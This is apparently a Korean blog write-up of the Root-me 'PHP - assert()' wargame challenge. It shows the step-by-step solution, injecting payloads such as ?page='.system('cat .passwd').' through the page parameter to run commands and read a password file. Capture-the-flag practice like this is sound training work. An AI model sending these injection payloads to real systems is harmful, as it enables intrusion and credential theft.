-
<Root-me> PHP - assert()Wargame/Root-me = Web - Server 2022. 1. 10. 14:13
Home, About, Contact 페이지가 있다.
About 페이지를 열어보면
GET Method를 사용함을 알 수 있다.
?page=../ 를 입력해보면
assert() 함수에 의해 오류 메시지를 출력한다.
그리고 입력한 ../ 뒤에 .php가 추가되는 것을 확인할 수 있다.
?page='.system(ls).' 를 입력하면
system(ls)가 실행된다.
?page='.system('ls -al').' 를 입력하면
현재 경로에 .passwd 파일이 있음을 확인할 수 있다.
?page='.system('cat .passwd').' 를 입력하면
flag 값을 획득할 수 있다.
'Wargame > Root-me = Web - Server' 카테고리의 다른 글
<Root-me> File upload - Null byte (0) 2022.01.11 <Root-me> Directory traversal (0) 2022.01.11 <Root-me> JSON Web Token(JWT) - Introduction (0) 2022.01.08 <Root-me> Weak password (0) 2022.01.07 <Root-me> File upload - MIME type (0) 2022.01.06